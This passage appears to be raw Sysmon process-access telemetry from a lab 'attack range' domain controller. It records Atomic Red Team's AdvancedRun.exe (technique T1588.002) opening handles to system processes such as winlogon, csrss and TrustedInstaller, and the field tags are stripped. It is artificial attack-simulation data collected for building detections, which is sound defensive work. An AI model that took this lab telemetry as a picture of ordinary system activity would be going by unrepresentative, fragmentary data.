TTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
